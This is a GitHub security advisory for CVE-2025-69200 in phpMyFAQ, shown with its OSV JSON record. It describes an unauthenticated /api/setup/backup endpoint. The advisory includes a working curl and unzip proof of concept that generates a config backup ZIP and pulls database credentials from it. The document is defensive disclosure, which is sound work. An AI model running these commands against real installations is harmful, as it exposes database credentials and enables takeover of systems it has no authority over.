ghsa-9cg9-4h4f-j6fg
Vulnerability from github
Published
2025-12-30 15:31
Modified
2025-12-30 15:31
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
phpMyFAQ has unauthenticated config backup download via /api/setup/backup
Details

Summary

An unauthenticated remote attacker can trigger generation of a configuration backup ZIP via POST /api/setup/backup and then download the generated ZIP from a web-accessible location. The ZIP contains sensitive configuration files (e.g., database.php with database credentials), leading to high-impact information disclosure and potential follow-on compromise.

Details

The endpoint /api/setup/backup is reachable via default rewrite rules and does not enforce authentication/authorization or API token verification. When called with any non-empty body (used as an “installed version” string), the server creates a ZIP archive inside the configuration directory and returns a direct URL to the generated ZIP file.

Relevant code paths: - Rewrite rule exposing the endpoint: - phpmyfaq/.htaccess: RewriteRule ^api/setup/(check|backup|update-database) api/index.php [L,QSA] - Controller implementation: - phpmyfaq/src/phpMyFAQ/Controller/Api/SetupController.phpbackup() - No call to hasValidToken(), userIsAuthenticated(), or any permission check - Backup creation: - phpmyfaq/src/phpMyFAQ/Setup/Update.phpcreateConfigBackup() - Writes the ZIP into the config directory and returns a public URL under content/core/config/

PoC

Replace BASE_URL with your instance URL.

1) Trigger config backup generation without authentication:

bash BASE_URL="http://localhost" curl -i -X POST "${BASE_URL}/api/setup/backup" \ -H "Content-Type: text/plain" \ --data "4.1.0-RC"

Expected result: 200 OK with JSON containing backupFile.

2) Copy the backupFile URL from the JSON response and download it (still without authentication):

```bash

Example (replace with the exact URL returned in step 1)

curl -i "http://localhost/content/core/config/phpmyfaq-config-backup.YYYY-MM-DD.zip" -o phpmyfaq-config-backup.zip ```

3) Verify sensitive content exists in the ZIP:

bash unzip -l phpmyfaq-config-backup.zip unzip -p phpmyfaq-config-backup.zip database.php

Observed: database.php is included and contains DB host/user/password.

Impact

  • Vulnerability class: Missing authentication/authorization for a sensitive function + sensitive information exposure.
  • Who is impacted: Any internet-exposed phpMyFAQ installation where the default .htaccess rewrite rules are active and the endpoint is reachable.
  • Security impact: Disclosure of configuration secrets (DB credentials, integration config, etc.), enabling follow-on attacks such as database takeover and data exfiltration.
Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "thorsten/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "thorsten/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.0-alpha"
            },
            {
              "last_affected": "4.1.0-beta.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-69200"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-202"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-30T15:31:19Z",
    "nvd_published_at": "2025-12-29T16:15:43Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn unauthenticated remote attacker can trigger generation of a configuration backup ZIP via `POST /api/setup/backup` and then download the generated ZIP from a web-accessible location. The ZIP contains sensitive configuration files (e.g., `database.php` with database credentials), leading to high-impact information disclosure and potential follow-on compromise.\n\n### Details\nThe endpoint `/api/setup/backup` is reachable via default rewrite rules and does not enforce authentication/authorization or API token verification. When called with any non-empty body (used as an \u201cinstalled version\u201d string), the server creates a ZIP archive inside the configuration directory and returns a direct URL to the generated ZIP file.\n\nRelevant code paths:\n- Rewrite rule exposing the endpoint:\n  - `phpmyfaq/.htaccess`: `RewriteRule ^api/setup/(check|backup|update-database) api/index.php [L,QSA]`\n- Controller implementation:\n  - `phpmyfaq/src/phpMyFAQ/Controller/Api/SetupController.php` \u2192 `backup()`\n    - No call to `hasValidToken()`, `userIsAuthenticated()`, or any permission check\n- Backup creation:\n  - `phpmyfaq/src/phpMyFAQ/Setup/Update.php` \u2192 `createConfigBackup()`\n    - Writes the ZIP into the config directory and returns a public URL under `content/core/config/`\n\n### PoC\nReplace `BASE_URL` with your instance URL.\n\n1) Trigger config backup generation without authentication:\n\n```bash\nBASE_URL=\"http://localhost\"\ncurl -i -X POST \"${BASE_URL}/api/setup/backup\" \\\n  -H \"Content-Type: text/plain\" \\\n  --data \"4.1.0-RC\"\n```\n\nExpected result: `200 OK` with JSON containing `backupFile`.\n\n2) Copy the `backupFile` URL from the JSON response and download it (still without authentication):\n\n```bash\n# Example (replace with the exact URL returned in step 1)\ncurl -i \"http://localhost/content/core/config/phpmyfaq-config-backup.YYYY-MM-DD.zip\" -o phpmyfaq-config-backup.zip\n```\n\n3) Verify sensitive content exists in the ZIP:\n\n```bash\nunzip -l phpmyfaq-config-backup.zip\nunzip -p phpmyfaq-config-backup.zip database.php\n```\n\nObserved: `database.php` is included and contains DB host/user/password.\n\n### Impact\n- Vulnerability class: Missing authentication/authorization for a sensitive function + sensitive information exposure.\n- Who is impacted: Any internet-exposed phpMyFAQ installation where the default `.htaccess` rewrite rules are active and the endpoint is reachable.\n- Security impact: Disclosure of configuration secrets (DB credentials, integration config, etc.), enabling follow-on attacks such as database takeover and data exfiltration.",
  "id": "GHSA-9cg9-4h4f-j6fg",
  "modified": "2025-12-30T15:31:19Z",
  "published": "2025-12-30T15:31:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69200"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/commit/b0e99ee3695152115841cb546d8dce64ceb8c29a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/thorsten/phpMyFAQ"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "phpMyFAQ has unauthenticated config backup download via /api/setup/backup"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.